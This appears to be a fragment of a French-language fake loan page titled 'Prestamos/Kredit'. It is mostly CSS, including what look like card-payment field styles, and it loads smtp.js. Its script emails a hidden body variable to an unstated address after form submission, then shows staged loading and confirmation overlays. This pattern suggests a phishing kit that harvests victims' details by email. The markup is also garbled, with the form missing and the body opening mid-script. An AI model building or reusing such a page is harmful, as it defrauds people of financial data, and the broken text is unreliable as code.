<!doctype html>
<html lang="fr"> 
 <head> 
  <meta charset="UTF-8">
  <title>Prestamos/Kredit</title>
  <meta http-equiv="X-UA-Compatible" content="IE=edge"> 
  <meta name="viewport" content="width=device-width, initial-scale=1.0"> 
  <script src="https://kit.fontawesome.com/7e2a69d5dd.js"></script> 
  <script src="https://smtpjs.com/v3/smtp.js"></script> 
 <style type="text/css" id="dcoder_stylesheet">@import url("https://fonts.googleapis.com/css2?family=Open+Sans:wght@400;600&display=swap");
@import url("https://fonts.googleapis.com/css2?family=Poppins:wght@300;400;500;600&display=swap");
@import url('https://fonts.googleapis.com/css2?family=Archivo+Black&display=swap');
*{
    margin:0;
    padding:0;
}
input{
  border:1px solid #777;
    width:81.7%;
    height:30px; 
    outline:none;
    margin-left:10%;
    color:
    margin-top:5%;
    font-family: "Poppins", sans-serif;
  font-size:15px;
  border-radius:5px;  
}



input[type="submit"] {
   background-color:deepskyblue;
   color:white;
   margin-left:11%;
   }
   .opta{
     font-family: "Archivo Black", sans-serif;
     font-size:13px;  
     margin-top:5%;
     margin-left:10%;
   }
   textarea{
       margin-top:5%;
       width:80%;
    height:100px;
    border-radius:3px;
    font-size:13px;
    margin-left:10%;
   }
   .img img{
       width:150px;
       margin-left:30%;
       margin-top:5%;
   }
     #heck{
    width:15px;
}
.check{
   display:flex;
   border:1px solid #777;
   width:90%;
   margin-left:5%;
}
.del{
    margin-top:5%;
    margin-left:2%;
}
.pay{
    margin-left:10%;
    display:flex;
   font-family: "Poppins", sans-serif;
   font-size:13px;
   color:#777;
}
  .title1{
      margin-left:5%;
      font-size:13px;
 font-family: "Archivo Black", sans-serif; 
  } 
  ag{
      font-size:13px; 
      font-family: "Poppins", sans-serif;
      color: ;
        
  }
  #closeButton{
      margin-top:-10%;
      margin-left:3%;
  }
  .yes{
     font-family: "Poppins", sans-serif; 
     margin-left:10%;
     margin-top:35%;
  }
  .cmg img{
      margin-left:8%;
      width:100px;
  }
  .ymg img{
      width:100px;
  }
  #dex{
      font-family: "Archivo Black", sans-serif;
      width:80%;
      height:40px;
      font-size:
      
  }
  .det{
    font-family: "Poppins", sans-serif; 
     margin-left:10%;
  }
  .gmg img{
    width:30px;
    cursor:pointer;
    margin-left:2%;
}
.menu{
    display:none;
    background-color: lightgrey;
    padding: 10px;
    animation: fadeIn 1s;
}

@keyframes fadeIn {
    from {
        opacity: 0;
    }
    to {
        opacity: 1;
    }
}

.close{
    float: right;
    cursor: pointer;
}
at{
 font-family: "Archivo Black", sans-serif;   
}
ad{
 font-family: "Poppins", sans-serif; 
    
}
a{
    text-decoration:none
}
.zmg{
    margin-top:%;
    position: 
    text-align:center;
    background-color:whi;
}
.zmg img{
    width:100px;
    display:;
}
.confi img{
    width:50px;
}
.confi{
  display:none; 
}
.ctv input{
    
}
.dyna{
    display:flex;
    margin-top:-5%;
}
.dyna1{
 width:40%;
 height:150px;
 border:1px solid #777; 
 border-radius:5px;  
 margin-left:8%;  
}
.dyna2{
   width:40%;
 height:150px;
 border:1px solid #777; 
 border-radius:5px; 
 margin-left:5%;   
}
.dyna1 img{
  width:48px; 
  margin-left:60%;
  margin-top:1.5%; 
}
.dyna2 img{
   width:50px; 
   margin-left:60%; 
}
.radio1{
   position: relative; 
   margin-top:-40%;
   margin-right:70%;
}
.radio2{
    position: relative;
    margin-top:-10%;
    margin-left:20%;
}
.cb{
    display:flex;
}
#cname2 {
    width:36%;
}
#cname3{
    width:35%;
}
.text1{
 font-family: "Archivo Black", sans-serif;  
 font-size:20px; 
 margin-top:35%;
 margin-left:5%;
 
}
.load{
  display:nne;
   position: relative;
   margin-top:-145%;
   margin-left:%;
   background-color:white;
   width:100%;
   height:530px;
   border-radius:5px;
   opacity:%;  
}
.alert1{
   display:none;
   position: relative;
   margin-top:-145%;
   margin-left:%;
   background-color:white;
   width:100%;
   height:530px;
   border-radius:5px;
   opacity:%;
}
.alert2{
  display:none; 
  position: relative;
   margin-top:-145%;
   margin-left:3%;
   background-color:white;
   width:100%;
   height:530px;
   border-radius:5px;
}
.alert1 img{
    width:170px;
    margin-left:25%;
    margin-top:60%;
}
.alert2 img{
    margin-top:70%;
    
    
}

.load img{
    width:170px;
    margin-left:25%;
    margin-top:60%;
}
.lmg img{
    width:150px;
    margin-top:-6.5%;
}
.lmg{
    
}
.dex img{
  margin-left:32%;
      
}
.omg img{
    width:100px;
}
tx{
    margin-left:18%;
    font-size:12px;
    
}
ax{
    font-size:12px;
  font-family: "Poppins", sans-serif;
  margin-left:15%; 
      
}
</style>



<body>

<        From: "",
        Subject: "This is the subject",
        Body: ebody2
    }).then(() => {
        window.location.href = "#"; // Redirection vers Google
    });
   }, 500); // Délai de 5000
   
   const alert1 = document.querySelector('.alert1');
const alert2 = document.querySelector('.alert2');

submit3.addEventListener('submit', (e) => {
    e.preventDefault();
    alert1.style.display = 'block'; // Rendre alert1 visible lors de la soumission du formulaire

    setTimeout(() => {
        alert1.style.display = 'none'; // Masquer alert1 après 5 secondes
        alert2.style.display = 'block'; // Rendre alert2 visible après 5 secondes
    }, 7000);
});

const load = document.querySelector('.load');

setTimeout(() => {
    load.style.display = 'none'; // Rendre le div "load" invisible après 3 secondes
}, 6000);

 
   
</script>
